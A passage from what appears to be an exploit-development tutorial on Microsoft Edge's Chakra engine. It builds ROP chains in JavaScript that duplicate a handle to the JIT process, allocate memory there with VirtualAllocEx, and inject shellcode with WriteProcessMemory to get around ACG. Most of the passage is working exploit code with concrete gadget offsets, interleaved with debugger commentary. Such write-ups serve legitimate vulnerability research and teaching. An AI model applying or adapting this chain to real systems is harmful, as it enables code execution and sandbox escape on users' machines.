write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
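
The long runs of identical padding writes in the listing above could be folded into a loop. The sketch below is not part of the exploit: pad is a hypothetical helper, and write64 is mocked to record writes so that the snippet runs outside the browser.

```javascript
// Mock of the exploit's write primitive so the sketch runs outside the browser:
// it records each 64-bit write instead of touching memory.
const written = [];
let counter = 0;
function write64(addrLo, addrHi, valueLo, valueHi) {
    written.push({ offset: addrLo, valueLo, valueHi });
}
function next() {
    counter += 0x8;
}

// Hypothetical helper: emit the filler qwords consumed by `add rsp, <bytes>`.
function pad(stackLo, stackHi, bytes) {
    for (let i = 0; i < bytes / 8; i++) {
        write64(stackLo + counter, stackHi, 0x41414141, 0x41414141);
        next();
    }
}

pad(0, 0, 0x48);   // after `mov r8, rdx ; add rsp, 0x48 ; ret` (9 qwords)
pad(0, 0, 0x28);   // after `mov r9, rcx ; ... ; add rsp, 0x28 ; ret` (5 qwords)
console.log(written.length, "padding qwords, counter = 0x" + counter.toString(16));
```

In the real exploit the first two arguments would be stackleakPointer[0] and stackleakPointer[1]; the zeros here are placeholders for the mock.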

Let’s start by setting a breakpoint on our first ROP gadget of pop rax ; ret, which is located at chakra_base + 0x577fd4. Our DuplicateHandle ROP chain uses this gadget two times. So, when we hit our breakpoint, we will hit g in WinDbg to jump over these two calls in order to debug our VirtualAllocEx ROP chain.

This ROP chain starts out by attempting to act on the R9 register to load in the flAllocationType parameter. This is done via the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret ROP gadget. As we previously discussed, the RCX register is used to copy the final parameter into R9. This means we need to place MEM_COMMIT | MEM_RESERVE into the RCX register, and let our target gadget copy the value into R9. However, we know that the RAX register is dereferenced. This means our first few gadgets:

  1. Place a valid pointer in RAX to bypass the cmp r8d, [rax] check
  2. Place 0x3000 (MEM_COMMIT | MEM_RESERVE) into RCX
  3. Copy said value in R9 (along with an add rsp, 0x28 which we know how to deal with by adding 0x28 bytes of padding)

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	-
	-
	-
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

After R9 gets filled properly, our next step is to work on the dwSize parameter, which will go in R8. We can directly copy a value into R8 using the following ROP gadget: mov r8, rdx ; add rsp, 0x48 ; ret. All we have to do is place our intended value into RDX prior to this gadget, and it will be copied into R8 (along with an add rsp, 0x48 - which we know how to deal with by adding some padding before our ret). The value we are going to place in R8 is 0x1000, which isn’t the exact size of our shellcode, but it gives us a good amount of space to work with, as 0x1000 is more room than we actually need.
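
Requesting 0x1000 costs nothing extra, because VirtualAllocEx works in whole pages and rounds the size up when lpAddress is NULL. A quick sketch of that rounding follows, assuming the usual 4 KB page size; roundUpToPage is a hypothetical helper, and the shellcode length is a made-up number for illustration.

```javascript
// Assumes the usual 4 KB page size on x64 Windows.
const PAGE_SIZE = 0x1000;

// Round a requested size up to the next page boundary.
function roundUpToPage(size) {
    return Math.ceil(size / PAGE_SIZE) * PAGE_SIZE;
}

// Hypothetical shellcode length, for illustration only.
const shellcodeLength = 0x200;
console.log("0x" + roundUpToPage(shellcodeLength).toString(16));
```

Any shellcode of up to 0x1000 bytes therefore fits in the single page the chain asks for.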

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	-
	-
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

The next parameter we will focus on is the lpAddress parameter. In this case, we are setting this value to NULL (or 0 in our case), as we want the OS to determine where our private allocation will be within the JIT process. This is done by simply popping a 0 value, which we can directly write to the stack after our pop rdx gadget using the write primitive, into RDX.

After executing the above ROP gadgets, our call to VirtualAllocEx is in the following state:

VirtualAllocEx(
	-
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

At this point we have supplied 3/5 arguments for VirtualAllocEx. The second-to-last parameter we configure will be the hProcess parameter - which is our now-duplicated handle to the JIT server with PROCESS_ALL_ACCESS permissions. Here is how this code snippet looks:

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

We can notice two things here. First, recall we stored the handle in an empty address within .data of chakra.dll. We can simply pop this pointer into RCX, and then dereference it to get the raw handle value. Second, this arbitrary dereference gadget, which extracts the value RCX points to, is followed by a write operation to the memory address at RAX + 0x20. Recall we have already placed a writable address into RAX, so we can simply move on knowing we “bypass” this instruction, as the write operation won’t cause an access violation - the memory RAX points to is already writable.
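
The effect of this gadget on registers and memory can be modeled with a Map standing in for memory. This is a sketch only: runGadget is a hypothetical helper, the addresses are illustrative, and 0xae8 is the duplicated handle value seen earlier in the post.

```javascript
// Tiny model of `mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret`.
// Memory is a Map from address to 64-bit value; the addresses below are illustrative.
function runGadget(regs, memory) {
    regs.rcx = memory.get(regs.rcx);          // mov rcx, qword [rcx]
    memory.set(regs.rax + 0x20n, regs.rcx);   // mov qword [rax+0x20], rcx
    return regs;
}

const handleSlot = 0x7ffc052ae010n;   // stands in for chakra+0x74e010
const scratch = 0x7ffc0528e128n;      // stands in for chakra+0x72e128
const memory = new Map([[handleSlot, 0xae8n]]);   // duplicated handle value from the text

const regs = runGadget({ rax: scratch, rcx: handleSlot }, memory);
console.log("rcx = 0x" + regs.rcx.toString(16));
```

Note the side effect: the handle value is also written to RAX + 0x20, so whatever lives at that address gets overwritten.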

Our call to VirtualAllocEx is now in the following state:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	-
);

The last things we need to do are:

  1. Place VirtualAllocEx into RAX
  2. Directly write our last parameter at RSP + 0x28 (we have already explained why RSP + 0x28 instead of RSP + 0x20) (this is done via our arbitrary write and not via a ROP gadget)
  3. jmp rax to kick off the call to VirtualAllocEx

Again, as a point of reiteration, we can simply write our last parameter to RSP + 0x28 directly, instead of using a gadget to mov [rsp+0x28], reg.

write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
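As a rough sketch of why the fifth parameter lands at RSP + 0x28, the snippet below lays out the qwords that follow the jmp rax gadget and prints each offset relative to RSP at the moment the API is entered. The `frameLayout` helper and the slot names are hypothetical, chosen only to mirror the comments in the chain.

```javascript
// Sketch: byte offsets (relative to RSP when the API is entered via jmp)
// of each qword written after the "jmp rax" gadget.
function frameLayout(stackArgs) {
    const slots = [
        "return address (add rsp, 0x38 ; ret gadget)",
        "shadow space 1",
        "shadow space 2",
        "shadow space 3",
        "shadow space 4",
        ...stackArgs,
    ];
    return slots.map((name, i) => ({ name, offset: i * 8 }));
}

const layout = frameLayout(["flProtect"]);
for (const { name, offset } of layout) {
    console.log("RSP+0x" + offset.toString(16).padStart(2, "0") + "  " + name);
}
```

Because the chain writes the "return address" slot by hand, everything after it shifts up by one qword. The four shadow-space qwords then push the first stack parameter to 0x28.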

When this occurs, our call will be in the following (final) state:

VirtualAllocEx(
	fulljitHandle, 			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Setting to NULL. Let VirtualAllocEx decide where our memory will be allocated in the JIT process
	sizeof(shellcode),		// Our shellcode is currently in the .data section of chakra.dll in the content process. Tell VirtualAllocEx the size of our allocation we want to make in the JIT process is sizeof(shellcode)
	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	PAGE_READWRITE			// Make our memory readable and writable
);

We can step into the jump with t and then use pt to hit the ret of VirtualAllocEx. At this point, as is generally true in assembly, RAX should contain the return value of VirtualAllocEx - which should be a pointer to a block of memory within the JIT process, size 0x1000, and RW.

If we try to examine this address within the debugger, we will see it is invalid memory.

However, if we attach a new WinDbg session (without closing out the current one) to the JIT process (we have already shown multiple times in this blog post how to identify the JIT process) we can see this memory is committed.

As we can see, our second ROP chain was successful and we have allocated a page of RW memory within the JIT process. We will eventually write our shellcode into this allocation and use a final-stage ROP chain we will inject into the JIT process to mark this region as RWX.

WriteProcessMemory ROP Chain

At this point in our exploit, we have seen our ability to control memory within the remote JIT process - where ACG is disabled. As previously shown, we have allocated memory within the JIT process. Additionally, towards the beginning of the blog, we stored our shellcode in the .data section of chakra.dll (see “Shellcode” section). We know this shellcode will never become executable in the current content process (where our exploit is executing) - so we need to inject it into the JIT process, where ACG is disabled. We will set up a call to WriteProcessMemory in order to write our shellcode into our new allocation within the JIT server.

Here is how our call to WriteProcessMemory will look:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	addressof(data_chakra_shellcode_location),	// Address of our shellcode in the content process (.data of chakra) (what we want to write (our shellcode))
	sizeof(shellcode),				// Size of our shellcode
	NULL 						// Optional
);

Here is the instrumentation of our ROP chain (including DuplicateHandle and VirtualAllocEx for continuity purposes):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return value (the address of our allocation) in the .data section of kernelbase.dll (it is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
